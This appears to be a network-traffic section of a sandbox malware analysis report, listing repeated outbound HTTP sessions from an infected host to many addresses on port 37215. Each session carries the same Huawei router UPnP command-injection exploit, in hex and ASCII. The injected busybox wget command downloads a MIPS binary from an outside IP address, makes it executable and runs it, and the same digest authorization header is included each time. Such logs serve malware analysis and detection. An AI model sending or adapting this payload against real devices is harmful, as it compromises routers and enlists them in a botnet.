                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1080192.168.2.154909045.78.135.10537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929646015 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1081192.168.2.154571031.127.135.9437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929666996 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1082192.168.2.1532894121.134.167.8337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929683924 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1083192.168.2.155831841.158.47.737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929687023 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1084192.168.2.155579437.232.92.16037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929708958 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1085192.168.2.155290294.151.104.23037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929745913 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1086192.168.2.1560168121.26.158.12237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929754972 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1087192.168.2.154531678.105.205.1437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929759026 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1088192.168.2.1544512197.125.188.14637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929785013 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1089192.168.2.1549590121.146.245.8237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:16.929812908 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
